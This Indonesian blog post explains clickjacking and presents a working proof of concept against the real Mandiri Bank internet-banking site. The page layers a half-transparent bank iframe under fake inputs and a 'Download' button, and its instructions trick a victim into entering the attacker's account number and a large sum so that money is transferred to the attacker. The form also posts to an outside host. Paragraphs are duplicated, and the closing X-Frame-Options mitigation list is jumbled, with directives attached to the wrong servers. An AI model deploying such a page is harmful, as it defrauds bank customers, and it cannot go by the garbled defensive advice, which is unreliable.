Sunday 24 November 2019
Clickjacking Attack
Clickjacking adalah sebuah jenis serangan pada aplikasi web. Contohnya, Ada sebuah website yang menampilkan sebuah pilihan tombol klik disini mendapatkan laptop gratis. Korban tentunya penasaran dan ingin mengklik tombol tersebut. Namus ketika diklik ternyata web akan mejalankan fungsi jahat yang telah dibuat oleh penyerang.
Jadi halaman web tersebut telah dimanipulasi oleh penyerang. Sehingga halaman tersebut sesungguhnya memiliki beberapa layer. Misalnya layer paling bawah ada tombol klik disini untuk mendapatkan laptop gratis. Namun diatas halaman tersebut ada sebuah layer yg tidak terlihat. Jadi ketika ingin mengklik tombol tadi, Sesungguhnya yg kita klik adalah layer tidak terlihat tersebut. Jadi si penyerang membajak sebuah tombol yg ingin kita klik dan di ganti dengan tombol lain yg berbahaya.
Contoh lainya adalah kasus Twitter Worm. Jadi penyerang menampilkan sebuah halaman untuk melihat sebuah berita di Twitter. Namun ketika diklik yg terjadi adalah korban melakukan retweet sebuah link alamat berbahaya. Contoh lainya penyerang memanfaatkan serangan ini untuk mendapatkan penghasilan dari google adsens. Sementara kasus yg paling berbahaya adalah penyerang menggunakan teknik ini untuk menyebarkan malware.
Jenis" Serangan Clickjacking
Jadi halaman web tersebut telah dimanipulasi oleh penyerang. Sehingga halaman tersebut sesungguhnya memiliki beberapa layer. Misalnya layer paling bawah ada tombol klik disini untuk mendapatkan laptop gratis. Namun diatas halaman tersebut ada sebuah layer yg tidak terlihat. Jadi ketika ingin mengklik tombol tadi, Sesungguhnya yg kita klik adalah layer tidak terlihat tersebut. Jadi si penyerang membajak sebuah tombol yg ingin kita klik dan di ganti dengan tombol lain yg berbahaya.
Contoh lainya adalah kasus Twitter Worm. Jadi penyerang menampilkan sebuah halaman untuk melihat sebuah berita di Twitter. Namun ketika diklik yg terjadi adalah korban melakukan retweet sebuah link alamat berbahaya. Contoh lainya penyerang memanfaatkan serangan ini untuk mendapatkan penghasilan dari google adsens. Sementara kasus yg paling berbahaya adalah penyerang menggunakan teknik ini untuk menyebarkan malware.
Jenis" Serangan Clickjacking
- CursorJacking
- LikeJacking
- CookieJacking
ClickJacking Attack
Agar lebih mudah di mengerti, Maka kita Langsung saja mencoba apakah sebuah situs dapat dieksploitasi ClickJacking.
Contoh kita menggunakan tag HTML :
<html>
<head>
<title>Clickjack test page</title>
</head>
<body>
<iframe src="bcstutoriall.blogspot.com" width="500" height="500"></iframe>
</body>
</html>
Nah code Html diatas akan memanggil frame dari halaman beauty cyber squad.
Contoh lain : Sample ClickJacking In Mandiri Bank
<html>
<title>
Clickjacking
</title>
<style type="text/css">
<!--
body {background: #D7E7F5 url('https://www.google.com/images/srpr/logo11w.png') no-repeat fixed center;}
-->
</style>
<center>
<h4> DUNIA IMAJINASI<br>
PASTEKAN NOMOR DIBAWAH INI KEDALAM MASING-MASING KOLOM<br>
1. 05435435 // Nomor Rekening Peretas<br>
2. 900.000.000 // Jumlah uang yang akan ditransfer<br>
CLICK DOWNLOAD<br>
ANDA AKAN MENDAPAT APA YANG INGINKAN<br>
</h4>
</h2>
CATATAN: KOLOM SUDAH DIPRIVACY HARAP PASTEKAN DENGAN HATI-HATI !
</h2>
</center>
<form action="http://devilzc0de.org/">
<input align="left" style="position:absolute;top:230px;left:660px" name="Rekening" value=""><br>
<input style="position:absolute;top:275px;left:660px" name="Rekening" value=""><br>
<button style="position:absolute;top:320px;left:700px">Download</button>
</form>
<iframe src="https://ib.bankmandiri.co.id/" style="position:absolute;width:800px;height:500px;top:90px;left:270px;opacity:0.5" scrolling="no" frameborder="none">
</iframe>
</html>
Contoh exploit diatas adalah form login yg kita umpamakan sebagai form transfer uang.
- Kolom pertama adalah nomor rekening
- Kolom kedua adalah jumlah uang yg akan di transfer
Karena kolom yg akan di isi adalah kolom pada frame yg kita hidden makan tidak akan muncul nilainya, Jadi sedikit menggunakan teknik social engineering agar si korban percaya untuk melakukan hal yg kita inginkan dan ketika si korban melakukan klik-an, maka korban telah melakukan pengiriman uang ke akun rekening kita.
Cara Mencegah ClickJacking
- Nginx
- Apacheadd_header X-Frame-Options "DENY" always;
- htaccessHeader always append X-Frame-Options DENY
- HTMLHeader append X-FRAME-OPTIONS "DENY"
- Gunakan Web Application Firewallmeta http-equiv="X-Frame-Options" content="deny"
Posts
